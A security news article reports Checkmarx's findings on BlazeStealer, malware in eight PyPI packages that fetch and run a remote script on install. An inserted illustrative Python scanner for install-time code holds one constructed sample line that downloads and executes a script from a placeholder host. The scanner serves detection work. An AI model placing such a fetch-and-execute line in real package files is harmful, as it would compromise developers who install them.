
The Cyber Security News


Beware, Developers: BlazeStealer Malware Discovered in Python Packages on PyPI

November 8, 2023

A new set of malicious Python packages has slithered its way to the Python Package Index (PyPI) repository with the ultimate aim of stealing sensitive information from compromised developer systems.

The packages masquerade as seemingly innocuous obfuscation tools, but harbor a piece of malware called BlazeStealer, Checkmarx said in a report shared with The Hacker News.

“[BlazeStealer] retrieves a further malicious script from an external source, enabling a Discord bot that gives attackers full control over the victim’s PC,” security researcher Yehuda Gelb said.


The campaign, which commenced in January 2023, involves a total of eight packages named Pyobftoexe, Pyobfusfile, Pyobfexecute, Pyobfpremium, Pyobflite, Pyobfadvance, Pyobfuse, and pyobfgood, the last of which was published in October.

These modules come with setup.py and init.py files that are designed to retrieve a Python script hosted on transfer[.]sh, which gets executed immediately upon their installation.

Named BlazeStealer, the malware runs a Discord bot and enables the threat actor to harvest a wide range of information, including passwords from web browsers and screenshots, execute arbitrary commands, encrypt files, and deactivate Microsoft Defender Antivirus on the infected host.
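As an added illustration (not code from Checkmarx or from the original article), the following sketch statically inspects a package's install-time file for the fetch-and-execute pattern described above, without running it. The function names, the heuristic lists and both sample inputs are constructed assumptions.

```python
import ast

# Package names listed in the article, lowercased for comparison.
REPORTED_NAMES = {"pyobftoexe", "pyobfusfile", "pyobfexecute", "pyobfpremium",
                  "pyobflite", "pyobfadvance", "pyobfuse", "pyobfgood"}
# Heuristic lists (assumptions of this example, not an exhaustive set).
NET_MODULES = {"urllib", "requests", "http", "socket", "httpx"}
EXEC_CALLS = {"exec", "eval", "system", "popen", "Popen", "run", "check_output"}

# Constructed sample inputs; they are parsed as text and never executed.
SAMPLE_SUSPECT = '''
from setuptools import setup
from urllib.request import urlopen
exec(urlopen("https://example.invalid/stage2.py").read())
setup(name="constructed-sample", version="0.0.1")
'''
SAMPLE_BENIGN = '''
from setuptools import setup
setup(name="benign-sample", version="1.0", url="https://example.invalid/project")
'''

def is_reported_name(name):
    """True if a dependency name matches one of the reported packages."""
    return name.strip().lower() in REPORTED_NAMES

def audit_install_code(source, filename="setup.py"):
    """Parse install-time code and report network use combined with dynamic execution."""
    net_imports, exec_calls, urls = set(), [], []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if isinstance(node, ast.Import):
            net_imports |= {a.name.split(".")[0] for a in node.names} & NET_MODULES
        elif isinstance(node, ast.ImportFrom) and node.module:
            net_imports |= {node.module.split(".")[0]} & NET_MODULES
        elif isinstance(node, ast.Call):
            # Rightmost name of the call target: os.system -> "system".
            name = getattr(node.func, "attr", None) or getattr(node.func, "id", None)
            if name in EXEC_CALLS:
                exec_calls.append((node.lineno, name))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value.lower().startswith(("http://", "https://")):
                urls.append(node.value)
    return {"net_imports": sorted(net_imports), "exec_calls": sorted(exec_calls),
            "urls": urls,
            # A URL alone (project metadata) is normal; paired with exec it is not.
            "fetch_and_execute": bool(exec_calls and (net_imports or urls))}

if __name__ == "__main__":
    for label, src in (("suspect", SAMPLE_SUSPECT), ("benign", SAMPLE_BENIGN)):
        print(label, audit_install_code(src))
```

A hit is a prompt for manual review of the unpacked source distribution, not a verdict, since legitimate build scripts also call subprocesses.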


What's more, it can render the computer unusable by ramping up CPU usage, inserting a Windows Batch script in the startup directory to shut down the machine, and even forcing a blue screen of death (BSoD) error.

“It stands to reason that developers engaged in code obfuscation are likely dealing with valuable and sensitive information, and hence, to a hacker, this translates to a target worth pursuing,” Gelb noted.


A majority of downloads associated with the rogue packages originated from the U.S., followed by China, Russia, Ireland, Hong Kong, Croatia, France, and Spain. They were collectively downloaded 2,438 times before being taken down.

“The open-source domain remains a fertile ground for innovation, but it requires caution,” Gelb said. “Developers ought to remain vigilant, and vet the packages prior to usage.”


Some parts of this article are sourced from:
thehackernews.com


Copyright © TheCyberSecurity.News, All Rights Reserved.